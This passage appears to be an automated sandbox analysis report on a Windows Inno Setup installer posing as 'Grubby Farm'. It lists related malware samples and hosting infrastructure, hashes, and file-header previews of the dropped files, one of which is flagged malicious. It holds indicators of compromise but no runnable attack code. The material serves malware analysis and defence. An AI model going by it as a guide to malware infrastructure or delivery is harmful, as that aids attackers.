bg.microsoft.map.fastly.net | 5fr5gthkjdg71.exe | Get hash | malicious | Quasar, R77 RootKit | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | dGhlYXB0Z3JvdXA=-free.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | hcxmivKYfL.exe | Get hash | malicious | RedLine | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | WN3Y9XR9c7.exe | Get hash | malicious | AsyncRAT | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | test.doc.bin.doc | Get hash | malicious | Unknown | Browse | 199.232.214.172
bg.microsoft.map.fastly.net | test.doc.bin.doc | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | ROtw3Hvdow.exe | Get hash | malicious | Unknown | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | vfrcxq.ps1 | Get hash | malicious | AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT | Browse | 199.232.210.172
bg.microsoft.map.fastly.net | trwsfg.ps1 | Get hash | malicious | AveMaria, DcRat, KeyLogger, StormKitty, Strela Stealer, VenomRAT | Browse | 199.232.214.172
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AS-CHOOPAUS | Setup.exe.7z | Get hash | malicious | Unknown | Browse | 207.246.91.177
AS-CHOOPAUS | Hilix.x86.elf | Get hash | malicious | Mirai | Browse | 45.63.53.202
AS-CHOOPAUS | Hilix.mips.elf | Get hash | malicious | Mirai | Browse | 45.63.53.238
AS-CHOOPAUS | kJsfHgzi7N.exe | Get hash | malicious | XWorm | Browse | 192.248.185.253
AS-CHOOPAUS | DF2.exe | Get hash | malicious | Unknown | Browse | 192.248.182.81
AS-CHOOPAUS | setup.msi | Get hash | malicious | Unknown | Browse | 45.77.249.79
AS-CHOOPAUS | http://parrottalks.info | Get hash | malicious | Unknown | Browse | 149.28.124.84
AS-CHOOPAUS | botx.mips.elf | Get hash | malicious | Mirai | Browse | 149.253.144.7
AS-CHOOPAUS | db0fa4b8db0333367e9bda3ab68b8042.x86.elf | Get hash | malicious | Mirai, Gafgyt | Browse | 78.141.232.165
                                                          No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | 1944b321.msi | Get hash | malicious | Unknown | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | Xzm9fAfKhB.exe | Get hash | malicious | Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | L9rm7AX4mp.exe | Get hash | malicious | Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | AX3-GUI-45.exe | Get hash | malicious | Unknown | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | file.exe | Get hash | malicious | Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | fe61hqe0Dt.exe | Get hash | malicious | Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | file.exe | Get hash | malicious | Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | file.exe | Get hash | malicious | LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz | Browse
C:\Users\user\AppData\Local\Temp\is-9HU94.tmp\_isetup\_isdecmp.dll | AX3-GUI-45.exe | Get hash | malicious | Unknown | Browse
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1310720
                                                                            Entropy (8bit):0.13580266959888063
                                                                            Encrypted:false
                                                                            SSDEEP:384:mJHL7HbahIfcjcidIiBysHciXBs78MmhRht43mKdyrf6YM5u:mJP74rzc8Myr43mNrf6YM5u
                                                                            MD5:FF6945C7EDF111473B667FD6780AD9A7
                                                                            SHA1:01A19DB9E47D3999B30AE6BECA3CBA8E0D574131
                                                                            SHA-256:67633B93D28A43E5C5DD3791C514F73AC1AE75D72B2DD21B703F07C9288DE8C5
                                                                            SHA-512:A13F9AA21D0CD07B9006DD8A3F6455F6A930703350AE06161846E3160144796DC4BAECDF2CE55869049D5A3F10B6DFF8CBF00ED371C11B3F9CD0CA205327F818
                                                                            Malicious:false
Preview: (binary; readable embedded strings: C:\ProgramData\Microsoft\Network\Downloader\ and, as a wide-character string, C:\ProgramData\Microsoft\Network\Downloader\qmgr.db)
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb0a00caf, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):1048576
                                                                            Entropy (8bit):0.8697548924881291
                                                                            Encrypted:false
                                                                            SSDEEP:1536:zSB2qSB2gSjlK/LfDalKohVF8/bGLBSBLil2d/3Cr5DHzk/3A5v7GoCnLKxKHKrx:zapaQK0yfOD8F31Xw
                                                                            MD5:C1A9B25B20545C205EFCF61DDC8C244D
                                                                            SHA1:6E4884D6CD0A47D677B4A587F4556CBDB81F9FC8
                                                                            SHA-256:571E2286FA1FF839B934C0C75429555A00BBC3B20B1A0186A34E5B97FB5AF76B
                                                                            SHA-512:88D746672A9E03169A603574A248868A15725AFEE01E79D3F8B1C657A728C296E432500DA084C291B709EB5BACD4C6A0D755E4AD65568852B514B0D0D1E93FEE
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):16384
                                                                            Entropy (8bit):0.0824452885110496
                                                                            Encrypted:false
                                                                            SSDEEP:3:Et/sB6kYtq1Bj4i4uRFE5/ll/Ygvlllallo0lJlbxvws:MAPYtMj3LRi5/llDlAL
                                                                            MD5:5868C568992AF525B70C7404ACFA45D0
                                                                            SHA1:2415637D8F30A2E2F305E75DFA7319768F31D5F2
                                                                            SHA-256:50B7A17D8D777B89CBF388BFBDC690A438ED025BD0D9F8FC910C288E5A4FF53A
                                                                            SHA-512:A4BE8EFB105474F1B2C99326C2D788F2E7D04E27031DB3FAB0A38CD7B6A1859C23F60CF5E55484263B91D378AD0E11218D42C234473E65AC27FB2F531702B530
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):3.534822227527675
                                                                            Encrypted:false
                                                                            SSDEEP:6:kKN8a8UzEsTwD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:yabzKImsLNkPlE99SNxAhUe/3
                                                                            MD5:DBBA4C8FD11CEFC31193623F9B2E3437
                                                                            SHA1:90CD90A1A58FEE504A90577FBF62B9FCFCE1094C
                                                                            SHA-256:1EE76E4211493483B1F3DB14BC1EACCC26F98D5224AFF81A7636F7D0F6AECBBD
                                                                            SHA-512:D8AC6017E9D148A2C0B2158D48465C5683DADE048C8BFDEE513A21A426C090ED94D53BC17F254FB6E13ED070B46F89FDF8D3A160D51685B67127F1E1D288E254
                                                                            Malicious:false
Preview: (binary; readable embedded wide-character string: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab "a7282eb40b1da1:0")
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):64
                                                                            Entropy (8bit):0.34726597513537405
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlll:Nll
                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13312
                                                                            Entropy (8bit):5.745960477552938
                                                                            Encrypted:false
                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: 1944b321.msi, Detection: malicious, Browse
                                                                            • Filename: Xzm9fAfKhB.exe, Detection: malicious, Browse
                                                                            • Filename: L9rm7AX4mp.exe, Detection: malicious, Browse
                                                                            • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: fe61hqe0Dt.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: file.exe, Detection: malicious, Browse
                                                                            • Filename: AX3-GUI-45.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1181184
                                                                            Entropy (8bit):6.401110768123626
                                                                            Encrypted:false
                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):13312
                                                                            Entropy (8bit):5.745960477552938
                                                                            Encrypted:false
                                                                            SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
                                                                            MD5:A813D18268AFFD4763DDE940246DC7E5
                                                                            SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
                                                                            SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
                                                                            SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):6144
                                                                            Entropy (8bit):4.215994423157539
                                                                            Encrypted:false
                                                                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                            MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                            SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                            SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                            SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):23312
                                                                            Entropy (8bit):4.596242908851566
                                                                            Encrypted:false
                                                                            SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                            MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                            SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                            SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                            SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\8n26gvrXUM.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1181184
                                                                            Entropy (8bit):6.401110768123626
                                                                            Encrypted:false
                                                                            SSDEEP:24576:jYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx94k:KGUhni7iSFCQ9J
                                                                            MD5:BCC236A3921E1388596A42B05686FF5E
                                                                            SHA1:43BFFBBAC6A1BF5F1FA21E971E06E6F1D0AF9263
                                                                            SHA-256:43A656BCD060E8A36502CA2DEB878D56A99078F13D3E57DCD73A87128588C9E9
                                                                            SHA-512:E3BAAF1A8F4EB0E1AB57A1FB35BC7DED476606B65FAFB09835D34705D8C661819C3CFA0ECC43C5A0D0085FD570DF581438DE27944E054E12C09A6933BBF5CE04
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1203559
                                                                            Entropy (8bit):6.373854032166884
                                                                            Encrypted:false
                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
                                                                            MD5:A6A8A9EA416599646B0F6C603068D2D3
                                                                            SHA1:689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
                                                                            SHA-256:20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
                                                                            SHA-512:93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:InnoSetup Log Grubby Farm, version 0x418, 3545 bytes, 928100\37\user\37, C:\Users\user\AppData\Local\376\377\377\
                                                                            Category:dropped
                                                                            Size (bytes):3545
                                                                            Entropy (8bit):3.7852110149300877
                                                                            Encrypted:false
                                                                            SSDEEP:96:Y/42pYFZn3jCdfc1AGlEDA4MZAe2LWxHh4t:YTqFZ32f7fDSmyH+t
                                                                            MD5:A2072C87B0AAA2FD74FB53106DAFBDBF
                                                                            SHA1:EB1CECF4F4DC12FD9E2D6BBBA441BB665DA98F20
                                                                            SHA-256:E8613D949AC73411BA8E7D7338C6850B10628F89C9C534BCD377E2FE3985CDB5
                                                                            SHA-512:4639C15E88B1D3441C1B93FD38ADC3617B9D62B3D0A4AD649768CD84A2BD274E1F3D48B035E5FFC3F45FF5CC0A3AAFECC68A424D6D1B5D4A86A8216B01104E54
                                                                            Malicious:false
                                                                            Preview:Inno Setup Uninstall Log (b)....................................Grubby Farm.....................................................................................................................Grubby Farm.................................................................................................................................%...............................................................................................................r ............s.......w........9.2.8.1.0.0......A.r.t.h.u.r......C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l....................... .....L....b...IFPS...............................................................................................................................................................BOOLEAN..............TEXECWAIT.................!MAIN....-1..'...dll:kernel32.dll.GetCurrentProcess.......(...dll:kernel32.dll.TerminateProcess............y... ...RESTARTINSTALLERWITHSILENTPARAMS....-1..EXPANDCONSTANT........EXEC.....
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1203559
                                                                            Entropy (8bit):6.373854032166884
                                                                            Encrypted:false
                                                                            SSDEEP:24576:bYwCLCUplZhgjXj8YcgoniqO3CBiO0jaS+EtjC67V5lNx941:yGUhni7iSFCQ9e
                                                                            MD5:A6A8A9EA416599646B0F6C603068D2D3
                                                                            SHA1:689AAD3A2A42F749E0C173A2F9E6E3751F7178BE
                                                                            SHA-256:20E6E5672C89CA84CAA6A060F97CDBAF4B042AC21AFCD2524C5FD120E7844164
                                                                            SHA-512:93BF69A80833B176190EDDD926B34AD466A5A1EE7893BFEBB9E2179C42ACA1BB3C36DBB98DE509B2DEC1F97AFFA2862BF9CA8A797D487AA4443EB5CDAF1C2236
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...V..O.....................N....................@..............................................@...............................7......8...........................................................................X...x............................text...<........................... ..`.itext.............................. ..`.data..../.......0..................@....bss....pa...............................idata...7.......8..................@....tls....<............ ...................rdata............... ..............@..@.rsrc...8............"..............@..@....................................@..@........................................................................................................................................
                                                                            Process:C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp
                                                                            File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1745567
                                                                            Entropy (8bit):7.095269474684338
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0OlRYeHGFRTIKJTPtpR2sVRcr4kO/B8nLj1yucyUeR37:0OlRYeHGFRkK7JuawLjj6eR37
                                                                            MD5:C6A93561FA2B6AF08724AE1CA16AF71C
                                                                            SHA1:1C2DD7373C544B1C8CF6EAB0CA2E17D41AE62363
                                                                            SHA-256:8FA95C6F3629180087E4BD86D10F55AEC2AE3FE07A780AF7B8EDF23A39A2872D
                                                                            SHA-512:A50B3ACC0415B61CC39E2FC12311EE6B9B539D5AF0A828C73CA422875D1A96EC13B719C702B29C3F8915DAA958DE2A9FDDD20FE3D6D4E0A36F665EF872353FB9
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 43%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....ZH.n........&"...+.4...j...... ................................................U....`... .........................................q....................@...g...h...9...... ........................... 5..(...................`... ............................text....3.......4..................`..`.data...`....P.......8..............@....rdata.......`.......<..............@..@.pdata...g...@...h..................@..@.xdata..............|..............@..@.bss....@....p...........................edata..q............8..............@..@.idata........... ...:..............@....CRT....`............Z..............@....tls.................\..............@....reloc.. ............^..............@..B........................................................................................................................................................................
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):55
                                                                            Entropy (8bit):4.306461250274409
                                                                            Encrypted:false
                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                            Malicious:false
                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.932606554344445
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 98.86%
                                                                            • Inno Setup installer (109748/4) 1.08%
                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            File name:8n26gvrXUM.exe
                                                                            File size:1'479'422 bytes
                                                                            MD5:c6f9f0ec394a72fb302efbcf74da2ea7
                                                                            SHA1:143c8fe025fbfd0afe9c88003315bc5a4720439a
                                                                            SHA256:0a63068ec9d94fef476d9e906fb4920de32e70b77daa24a8b2a0786f23889a1a
                                                                            SHA512:0ae6cce0267432ea2a6f44a40d9171238ee8c2025934e2b5a46d7cc7c4ffaefda483440f0cef7d1502c7e74124116565b11dbb1f14a6b6b02313ac45d3b64a45
                                                                            SSDEEP:24576:QMjhJ3I+qWJFFjV96zSzjq7z16g/RMcdGoKmS896ORyAt05bmktUNudtJjdPrF:jnwuVnFzjql6t5ofSs60tab7SNudXjdZ
                                                                            TLSH:2C652302B3C34871F8690A349C62C550EE17BD681DF6601B6EB9FE0E8DF92C25C7DA64
                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                            Icon Hash:29226ee6b692c62f
